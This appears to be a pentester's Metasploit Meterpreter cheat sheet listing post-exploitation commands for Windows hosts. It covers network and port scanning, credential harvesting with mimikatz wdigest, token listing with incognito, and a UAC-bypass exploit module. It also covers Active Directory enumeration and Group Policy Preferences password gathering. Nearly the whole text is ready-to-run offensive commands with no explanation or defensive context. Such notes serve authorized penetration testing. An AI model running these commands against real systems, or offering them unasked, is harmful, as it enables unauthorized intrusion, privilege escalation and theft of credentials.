# Metasploit

## Meterpreter 

### Arp Scan 

```
run arp_scanner -r <iP>/24
```

### Nmap

```
db_nmap -sS -A <IP> 
```

### PortScan

```
run auxiliary/scanner/portscan/tcp
```

### Application Info

```
run post/windows/gather/enum_applications
```

### Credential Gathering&#x20;

```
run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito 
list_tokens -u 
```

### Windows&#x20;

```
# Collect a load of info 
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as 
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection
```

### AD&#x20;

```
# Enumeration ADSI
load extapi
help extapi 

adsi_computer_enum domainname 

# GPP 
use post/windows/gather/credentials/gpp
```